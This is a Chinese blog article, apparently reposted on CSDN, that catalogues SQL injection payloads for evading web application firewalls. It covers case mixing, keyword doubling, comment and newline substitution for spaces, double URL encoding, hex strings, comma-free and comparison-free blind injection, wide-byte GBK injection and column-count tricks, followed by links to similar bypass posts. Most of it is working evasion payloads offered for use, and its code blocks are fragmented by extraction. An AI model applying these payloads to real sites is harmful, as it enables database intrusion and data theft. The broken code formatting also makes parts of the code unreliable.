sql总结---------绕过WAF继续注入

最新推荐文章于 2024-03-15 10:20:52 发布
最新推荐文章于 2024-03-15 10:20:52 发布
阅读量387 收藏
点赞数
原文链接:https://blog.csdn.net/Fly_hps/article/details/79509171
版权

1.WAF过滤机制:

1.异常检测协议–拒绝不符合HTTP标准的请求; 
2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证; 
3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题; 
4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活; 

5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄露保护等。

2.WAF绕过姿势

(1)大小写绕过

此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。 

这里有道题:http://wargame.kr:8080/login_filtering/

(2)替换关键字

这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过

http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

(3)空格绕过

payload


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select
        
        /**/*
        
        /**/
        
        from
        
        /**/yz;
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select%
        
        0a*%
        
        0afrom%
        
        0ayz; %0a 是回车
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        /*!select*/
        
        /*!**/
        
        /*!from*/
        
        /*!yz*/;
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select(a)
        
        from(yz);
       
       
    
      
      
  6. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select(a)
        
        from(yz)
        
        where(a=
        
        1);

(4)替换关键字 

这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过

SELselectECT 1,2,3,4

(5)URL编码

有时后台界面会再次URL解码所以这时可以利用二次编码解决问题 
后台语句


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        $insert=$link->query(urldecode($_GET[
        
        'id']));
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        $row=$insert->fetch_row();
       
       
    
      
      

    
    

    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * from yz
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * from  %2579%257a

(6)十六进制绕过(引号绕过)

在SQL语句的数据区域可以采用十六进制绕过敏感词汇


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select a 
        
        from yz 
        
        where b=
        
        0x32;
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * 
        
        from yz 
        
        where b=
        
        char(
        
        0x32);
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * 
        
        from yz 
        
        where b=
        
        char(
        
        0x67)+
        
        char(
        
        0x75)+
        
        char(
        
        0x65)+
        
        char(
        
        0x73)+
        
        char(
        
        0x74)
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  6. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  7. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select column_name  
        
        from information_schema.tables 
        
        where table_name=
        
        "users"
       
       
    
      
      
  8. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select column_name  
        
        from information_schema.tables 
        
        where table_name=
        
        0x7573657273

(7)逗号绕过

在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决。 

substr(),mid()


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        mid(user() from 1 for 1)
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        substr(user() from 1 for 1)
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select 
        
        substr(
        
        user()
        
        from 
        
        -1) 
        
        from yz ;
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select 
        
        ascii(
        
        substr(
        
        user() 
        
        from 
        
        1 
        
        for 
        
        1)) < 
        
        150;
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  6. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        同时也可以利用替换函数
       
       
    
      
      
  7. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select 
        
        left(
        
        database(),
        
        2)>
        
        'tf';

limit


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        selete * 
        
        from testtable limit 
        
        2,
        
        1;
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        selete * 
        
        from testtable limit 
        
        2 offset 
        
        1;

(8)比较符(<,>)绕过

同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest,strcmp来进行绕过了。


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * 
        
        from users 
        
        where id=
        
        1 
        
        and greatest(ascii(substr(database(),0,1)),64)=
        
        64
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select strcmp(left(database(),1),0x32);
        
        #lpad('asd',2,0)
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        if(substr(id,
        
        1,
        
        1)
        
        in(
        
        0x41),
        
        1,
        
        3)

新学习了一种骚骚的注入姿势in、between、order by 


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * 
        
        from yz 
        
        where a 
        
        in (
        
        'aaa'); 
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select 
        
        substr(a,
        
        1,
        
        1) 
        
        in (
        
        'a') 
        
        from yz ;
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * 
        
        from yz 
        
        where a 
        
        between 
        
        'a' 
        
        and 
        
        'b'; 
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * 
        
        from yz 
        
        where a 
        
        between 
        
        0x89 
        
        and 
        
        0x90;
       
       
    
      
      
  6. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  7. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        select * 
        
        from yz 
        
        union 
        
        select 
        
        1,
        
        2,
        
        3 
        
        order 
        
        by 
        
        1;

也可以用like,根据排列顺序进行真值判断

(9)注释符绕过

在注入时的注释符一般为# --当两者不能用时就不能闭合引号 
这里介绍一个奇淫巧技 

select 1,2,3 from yz where '1'/1=(1=1)/'1'='1'
(1=1)中就有了判断位为下面的注入打下基础

(10)宽字节绕过

字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在%df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。

注:`select`防止用户自定义的名称和mysql保留字冲突

(11)with rollup

一般结合group by使用


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
        
        select 
        
        1 
        
        as 
        
        test 
        
        from  yz 
        
        group 
        
        by 
        
        test 
        
        with 
        
        rollup 
        
        limit 
        
        1 
        
        offset 
        
        1;
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        +
        
        ------+
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        | test |
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        +
        
        ------+
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        | NULL |
       
       
    
      
      
  6. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        +
        
        ------+

(12)无列名注入

给未知列名起别名 

select a from (select 1,2,3aunion select * from yz)v;

(13) 判断列数绕过

当order by 被过滤后就可以使用into 变量来绕过 

select * from yz limit 1,1 into @a,@b,@c;




bylfsj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WAF绕过小技巧
tomyyyyy
09-22 6738
一、WAF绕过 1、脏数据绕过 即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功绕过。 2、高并发绕过 对请求进行并发,攻击请求会被负载均衡调度到不同节点,导致某些请求绕过waf的拦截 3、http参数污染...
常见的WAF绕过方法
武天旭的博客
02-11 1万+
本篇文章通过网络架构层、HTTP协议层、第三方应用层讲解了绕过WAF的常见方法 一、网络架构层 一般通过域名指向云WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现绕过。 具体方法如下: 1、查找相关的二级域名及同一域名注册者的其他域名解析记录。 2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如: windows可以执行命令: nslookup -qt=mx baidu.com Linux可以执行如下命令来查看baidu.com域名的MX解析...
绕过 Web 应用程序防火墙 (WAF) 的 5 种方法
MachineGunJoe666
06-06 3197
WAF 是一种网络安全解决方案,用于过滤和阻止恶意网络流量。常见的供应商包括 CloudFlare、AWS、Citrix、Akamai、Radware、Microsoft Azure 和 Barracuda。根据防火墙使用的机制组合,绕过方法可能会有所不同。例如,WAF 可能使用正则表达式来检测恶意流量。正则表达式用于检测字符串中的模式。您可以在此处阅读有关它们的更多信息。WAF 还可以采用基于签名的检测,其中已知的恶意字符串被赋予存储在数据库中的签名,防火墙将根据数据库的内容检查 Web 流量的签名。
(18)【WAF绕过WAF部署、绕过分析和原理、注入绕过WAF方法
02-27 6849
WAF绕过
WAF绕过
Z_l123的博客
02-19 1930
实验原理 WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入,跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。 作为攻击者来说,常见的绕过WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union,但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执行
详解SQL注入--安全(二)
09-09
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或转义用户输入的SQL语句时。当攻击者向Web表单或URL参数中输入特定的SQL命令片段时,他们可以篡改数据库查询,获取敏感信息,甚至控制整个数据库...
sql注入绕过方法总结
12-19
sql注入绕过方法总结绕过waf,D盾
sql注入-0629-田靖宇-17130105521
08-08
2. **字符编码转换**:如使用`0x7e`来表示`~`,在某些情况下可能需要进行编码转换以绕过过滤。 3. **分页注入**:通过`limit`关键字获取更多数据。 4. **字符集识别**:理解字符集以正确构造SQL语句。 5. **错误处理...
sql-bypass.py
05-25
sql注入垃圾数据waf,如果是POST型就直接把垃圾数据放到你要注入的字段前后,如果是GET型就把他转为POST型再放垃圾数据。
SQL注入天书 sqli-labs
01-11
9. **Web应用防火墙(WAF绕过**:理解WAF的工作原理,学习如何识别和规避WAF规则。 10. **自动工具的使用**:如Burp Suite、sqlmap等自动化工具的使用,可以提高测试效率。 通过对sqli-labs的实战演练,你将具备...
WAF绕过思路
永远是少年
03-12 3526
WAF绕过思路 WAF在渗透测试中,是我们要面对的第一关卡,渗透测试人员对站点WAF绕过过程就是渗透测试人员与网站管理员(或WAF开发者)进行PK的过程。在对WAF的渗透时,一般可以考虑采用以下方式展开。 一、增加WAF负担 WAF是为网站安全服务的,但是WAF的存在如果干扰了网站的正常运行,则会得不偿失,因此,网站管理员一般会恰当的配置WAF,起到在不会干扰网站正常运行的前提下,对用户的输入进行过滤的作用。因此,有些WAF就会设置如果数据包长度过长,就对部分数据包或者是数据包的部分内容进行无检测“放行”
WAF机制及绕过方法
qq_64162562的博客
03-15 943
WAF(Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通俗来说就是WAF产品里集成了一定的检测规则,会对每个请求的内容根据生成的规则进行检测并对不符合安全规则的作出对应的防御处理,从而保证Web应用的安全性与合法性。我们在平时的渗透测试中,更多情况下会遇到的是网站开发人员自己写的防护规则。网站开发人员为了网站的安全,会在可能遭受攻击的地方增加一些安全防护代码,比如过滤敏感字符,对潜在的威胁的字符进行编码、转义等。
WAF绕过思路整理(挺全)
weixin_50464560的博客
10-23 8896
转载至:https://harmoc.com/secnote/waf%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%E6%95%B4%E7%90%86.html WAF绕过思路整理 <div class="entry-meta"> <ul class="post-meta"> <li><span class="posted-on"><time class="entry-date p
oracle waf绕过-WAF Bypass技巧(3)
AI
06-08 898
oracle waf绕过的一些玩法
WAF详解及WAF绕过
赤赤三的博客
03-20 8793
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
第8篇:Oracle注入漏洞waf的新语句
ABC_123的博客
05-02 690
Part1 前言大家好,上期分享了一次MS12-020蓝屏漏洞的巧用。这篇文章源于之前做的一个银行红队项目,遇到到了一个Oracle数据库的SQL注入漏洞,但是网上能搜索到的各种SQL语句都没法出数据,所以客户不认可这个漏洞的危害性,于是就开始了对这个Oracle的SQL注入WAF的探索过程:Part2 研究过程SQL注入判断过程经过对Web应用一系列的手工漏洞.........
实战绕过两层waf完成sql注入
hackzkaq的博客
12-30 560
更多黑客技能 公众号:暗网黑客 文章来源:https://lipeilipei.top/ 以下内容仅作为学习研究,禁止用于违法犯罪活动,由此产生的法律风险自行承担。 某网站存在一处sql注入漏洞。 在 id 后面加上 and 1=1,被 waf 拦截 将空格替换为加号 +,即 id=296+and+1=1 不再拦截 再将 id 改为 id=296+and+1=2,新闻详情返回为空,确认存在注入漏洞 通过 order by 查询字段数 ↓ 字段数超过长度的时候,新闻详情展示为空,没有超过长度的时候正.
waf绕过详解
热门推荐
zdy8023的博客
04-13 1万+
目录 waf防护原理讲解 目录扫描绕过waf 手工注入绕过waf sqlmap注入绕过waf 编写sqlmap绕过waf脚本 过waf一句话编写讲解 菜刀连接绕过waf webshell上传绕过waf 提权绕过waf waf绕过原理详解 了解waf防护原理 查看waf防护位置 熟悉防护规则 了解防护机制 查看拦截时间阀值 我们可以下载一个安全狗,查看它详细的防护机制,...
实战 | WAF-Bypass之SQL注入绕过思路总结
Ms08067安全实验室
03-08 1210
WAF(针对云WAF)寻找真实IP(源站)绕过如果流量都没有经过WAFWAF当然无法拦截攻击请求。当前多数云WAF架构,例如百度云加速、阿里云盾等,通过更改DNS解析,把流量引入WAF集群,流量经过检测后转发请求到源站。如图,dict.com接入接入WAF后,dict.com的DNS解析结果指向WAF集群,用户的请求将发送给WAF集群,WAF集群经过检测认为非攻击请求再转发给源站。绕过WAF...
waf绕过sql注入
最新发布
06-26
WAF绕过SQL注入通常是攻击者针对WAF的安全策略和技术限制来实施的一种技术手段,常见的方法包括: 1. **参数编码和转义**: 攻击者可能会尝试使用特殊字符的转义序列,如\"\'(单引号)或\"\"(双引号),来欺骗WAF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值